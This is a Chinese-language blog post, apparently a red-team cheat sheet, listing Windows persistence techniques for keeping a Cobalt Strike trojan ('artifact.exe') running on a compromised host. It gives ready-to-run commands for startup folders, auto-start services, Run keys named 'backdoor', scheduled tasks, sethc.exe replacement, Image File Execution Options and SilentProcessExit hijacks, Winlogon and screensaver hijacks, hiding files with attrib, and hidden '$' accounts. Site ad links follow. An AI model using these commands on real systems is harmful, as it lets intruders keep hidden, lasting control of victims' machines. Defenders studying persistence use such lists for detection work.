windows权限维持整理
windows权限维持
1、自启动路径加载
将cs生成的木马,放到目录下后,等待目标机器关机重启上线
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
过来一会儿就成功上线
2、自启动服务加载
为目标主机添加自启动服务
sc create "ServiceTest" binpath= "cmd.exe /k C:\artifact.exe" depend= Tcpip obj= Localsystem start= auto 添加
sc delete ServiceTest 删除
将马子先放到c盘,然后添加自启动服务
cmd命令
sc create "ServiceTest" binpath= "cmd.exe /k C:\artifact.exe" depend= Tcpip obj= Localsystem start= auto
成功,关机重启
然后等待一会儿,成功上线
3、自启动注册表加载
-当前用户键值
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
-服务器键值(需要管理员权限)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
-添加启动项
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\artifact.exe" #cmd命令
然后重启,稍等一会儿就上线了
4、计划计时任务
打开任务计划程序,操作
创建基本任务
绑定启动程序木马文件,下一步
完成
有的时候还需要将属性的一些设置改掉
操作里面有事电源条件什么的需要取消一下
触发器什么的也加一些上去
然后重启下,上线了
5、替换辅助功能程序
系统自带的辅助功能进行替换执行,放大镜,旁白,屏幕键盘等均可。
c:\windows\system32\sethc.exe
move sethc.exe sethc1.exe
copy cmd.exe sethc.exe
不过这种方法需要取得system权限,用的不多了
6、映像劫持
测试:执行notepad成cmd
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"
打开txt文件时,弹出计算器
配合GlobalFlag隐藏:执行正常关闭后触发
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\artifact.exe"
打开记事本
这边也上线了
7、WinLogon配合无文件落地上线
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\artifact.exe"
注销用户重新连接时上线
8、屏幕保护生效后执行后门
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\artifact.exe" /f
也是操作注册表实现,就不演示吧,等屏幕长时间不操作保护状态的时候就上线了
9、隐藏后门木马
Attrib +s +a +h +r 【文件名】 #隐藏命令
Attrib -s -a -h -r *.exe* #恢复命令
本来有的,Attrib +s +a +h +r artifact.exe 一下,就没了
然后Attrib -s -a -h -r *.exe*
下就出来了
10、影子账户
在添加用户的时候,在用户名后面加$符号达到隐藏账户的目的
net user peng$ 123456py. /add
net user #这样是看不到的
不过可以在本地用户或组或注册表中看到
11、克隆账户
本来是做实验的,不过最后还是可以看到,看下这篇文章吧,挺细的
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· .NET10 - 预览版1新功能体验(一)